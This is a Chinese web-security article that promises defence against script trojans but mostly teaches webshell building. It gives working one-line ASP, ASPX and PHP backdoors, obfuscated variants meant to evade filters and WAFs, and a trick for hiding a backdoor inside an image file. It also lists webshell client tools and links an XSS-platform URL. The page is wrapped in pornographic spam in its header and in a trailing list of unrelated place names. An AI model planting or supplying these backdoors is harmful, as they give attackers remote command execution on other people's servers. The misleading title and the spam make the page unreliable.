91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

web安全中腳本木馬如何防御

發布時間:2021-12-20 09:54:35 來源:億速云 閱讀:276 作者:小新 欄目:網絡管理

這篇文章給大家分享的是有關web安全中腳本木馬如何防御的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

腳本木馬的制作原理

webshell就是一種網頁后門(web后門)

webshell制作原理
webshell使用技巧
webshell"黑吃黑"

一. webshell制作原理

一句話木馬(2010年出來)--> 上傳大馬進行提權
小馬                --> 上傳大馬進行提權
大馬
打包馬
脫褲馬
執行命令馬

GetShell就是拿webshell的動作

1. 一句話木馬

一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用

asp : 
<% execute request("value") %>
<%eval request ("pass")%>
--------------------------------------
sms2056.com/x.asp?value="cmd"
aspx : 
<%@ Page Language="Jscript"%>
<%eval(Request.I tem["pass"]," uns afe");%>
PHP : 
<?php @eval($_POST['attack']) ?>

2. 工作原理

黑客在注冊信息的電子郵箱或個人主頁等中插入類似如下代碼:

<%eval request ("pass")%>

其中pass是值,所以你可以更改自己的值,前面的request就是獲取這個值

上述代碼現在比較多見,而且字符數少,對表單字數有限制的地方特別的實用

當知道了數據庫的URL,就可以利用本地一張網頁進行連接得到WebShell(不知道數據庫也可以,只要知道一句話木馬的文件被插入到那一個ASP文件里面就可以了)

一句話木馬是基于B/S結構的

3. 一句話木馬變形

<?php $_GET['a']($_POST['b']) ?>
---------------------------------------
x.php?a=eval&b="cmd"
<%Eval (Request(chr(112)))%>
---------------------------------------
aspcms2.0以上會檢查腳本中的雙引號""",單引號"'"
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>
<% a=%request("gold") %><%eval %a%>

4. 一般WAF繞過方式

函數繞過
編碼繞過
可變變量繞過
動態獲取參數繞過

5. 一句話圖片馬的制作

C32下做一句話
打開c32, 把圖片放里面,寫入一句話保存,退出
cmd下做一句話
copy /b 1.jpg+1.asp 2.jpg
win7下右鍵圖片,在屬性 -> 詳細信息 -> 版權內插入一句話即可

6. 常見的一句話客戶端

中國菜刀
中國砍刀
蟻劍
C刀
lanker一句話客戶端
ZV新型PHP一句話木馬客戶端GUI版
一句話客戶端增強版

7. 大馬

大馬體積比較大,一般50kb以上.功能也多,一般都包含提權命令,磁盤管理,數據庫連接接口,執行命令甚至有些以具備自帶提權功能和壓縮,解壓縮網站程序的功能.這種馬隱蔽性不好,而大多代碼如不加密的話很多殺毒廠商開始追殺此類程序 .

用途 : 
提權
打包
脫褲
增刪文件

8. 小馬

作用主要用戶上傳大馬

二. webshell使用技巧

內容編碼
配合解析漏洞
配合文件包含
利用文件名溢出

三. webshell"黑吃黑"

http://xss.fbisb.com/xss.php?do=login

1. 找shell后門

查找后門
查找webshell后門
找到后門地址
反搞wehshell箱子

2. 找一句話客戶端后門

查找客戶端后門
找到后門地址
反搞wehshell箱子

感謝各位的閱讀!關于“web安全中腳本木馬如何防御”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節
推薦閱讀:
  1. web安全之XSS
  2. web安全

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

web
AI

枣阳市| 东海县| 静海县| 金塔县| 虞城县| 白城市| 招远市| 石景山区| 大厂| 陆川县| 灯塔市| 武定县| 蛟河市| 秭归县| 凌云县| 怀柔区| 通化县| 永嘉县| 获嘉县| 禹州市| 安远县| 济南市| 通州市| 江西省| 延寿县| 内丘县| 衡水市| 霍城县| 永福县| 利辛县| 太白县| 耒阳市| 汤原县| 文安县| 沅江市| 廊坊市| 罗源县| 余庆县| 扎兰屯市| 汨罗市| 武乡县|